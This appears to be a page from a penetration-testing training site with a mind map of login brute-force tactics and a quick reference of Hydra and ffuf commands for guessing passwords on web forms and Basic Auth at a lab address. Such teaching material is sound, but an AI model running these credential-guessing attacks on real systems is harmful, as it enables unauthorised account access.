Dashboard > Mind Maps > Login Brute Force Strategy

Login Brute Force Strategy

Attacking authentication mechanisms

Tip: Click on any node to see related information!

MAP Interactive Mind Map

graph TD A[Login Page] --> B[Identify Tech] B --> C{Attack Type} C --> D[Credential Stuffing] C --> E[Password Spraying] C --> F[Brute Force] D --> G[Known Breaches] E --> H[Common Passwords] F --> I[Wordlists] I --> J[Hydra/Burp] J --> K[Handle Rate Limits] K --> L[Success]

MODULES Related Modules

Login Brute Forcing

Brute forcing web login forms and services....

Web

REF Quick Reference

Web Forms

hydra -l admin -P wordlist.txt 10.10.10.5 http-post-form '/login:username=^USER^&password=^PASS^:F=Invalid' # Brute force POST login form

Basic Auth

hydra -l admin -P wordlist.txt 10.10.10.5 http-get /admin # Brute force Basic Auth

Ffuf

ffuf -u http://10.10.10.5/login -X POST -d 'user=admin&pass=FUZZ' -w wordlist.txt -fc 401 # Brute force login with ffuf

Back to Mind Maps View Full Module

Save Your Progress